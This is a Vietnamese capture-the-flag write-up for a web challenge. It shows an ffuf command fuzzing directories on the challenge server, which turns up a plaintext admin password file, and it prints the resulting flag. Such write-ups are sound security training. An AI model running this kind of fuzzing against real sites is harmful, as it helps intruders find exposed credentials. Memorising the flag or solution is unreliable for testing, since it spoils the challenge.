Bỏ qua

Newbie Coding

Introduction

EHCTF

Category: Web

Write-up date: 03/03/2025

Question: Can you find admin ?. Try to do it if you can.

P/s: I am a newbie, and .txt is my love.

Tài khoản test: test:123

Point: 100

Recon

Sau khi đọc qua đề bài, ta có thể thầy chall này liên quan tới recon là chủ yếu. Một người mới lập trình đến web có user là admin rất thích .txt. Vậy là web có liên quan tới admin.txt hay gì đó.

Truy cập vào đề bài là một màn hình login:Login screen

Sau khi đăng nhập thì ta vào được dashboard của hệ thống nhưng không có bất kỳ một chức năng nào Dashboard test

Thử admin với sqli thì kết quả trả về là Incorrect password!!! vậy ta có thể tạm thời loại bỏ việc trang có vuln về sqli và tập trung vào việc fuzzing để ra file admin.txt

Fuzzing

Sử dụng phần mềm để Fuzz (Mình dùng ffuf):

ffuf -w common.txt -u http://challenge.ctf.ehc-fptu.club:35798/FUZZ/admin.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://challenge.ctf.ehc-fptu.club:35798/FUZZ/admin.txt
 :: Wordlist         : FUZZ: /home/pandakewt/Documents/ffuf/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.htaccess               [Status: 403, Size: 295, Words: 20, Lines: 10, Duration: 46ms]
.htpasswd               [Status: 403, Size: 295, Words: 20, Lines: 10, Duration: 4318ms]
.hta                    [Status: 403, Size: 295, Words: 20, Lines: 10, Duration: 4357ms]
index.php               [Status: 200, Size: 1548, Words: 271, Lines: 27, Duration: 50ms]
server-status           [Status: 403, Size: 295, Words: 20, Lines: 10, Duration: 49ms]
user                    [Status: 200, Size: 22, Words: 1, Lines: 1, Duration: 44ms]
:: Progress: [4686/4686] :: Job [1/1] :: 621 req/sec :: Duration: [0:00:09] :: Errors: 0 ::

Sau khi fuzz ta có thể thấy được là file admin.txt nằm trong folder user, và chúng ta có quyền truy cập vào file đó ( code 200).

Truy cập vào file user/admin.txt ta được trả lại một đoạn string 4dd01c8b32e4a3097b86

Tiếp tục truy cập vào user/test.txt ta được trả về kết qủa là 123, như vậy có thể xác định là giá trị trên là mật khẩu của admin. Đăng nhập vào tài khoản admin thì ta được trả về flag là Flag: EHCTF{SomeTIme5_EvERy7h1Ng_I5_EA5Y_7Han_y0u_ThlNK_:V_44380a08ef95} Dashboard admin

FLAG: EHCTF{SomeTIme5_EvERy7h1Ng_I5_EA5Y_7Han_y0u_ThlNK_:V_44380a08ef95}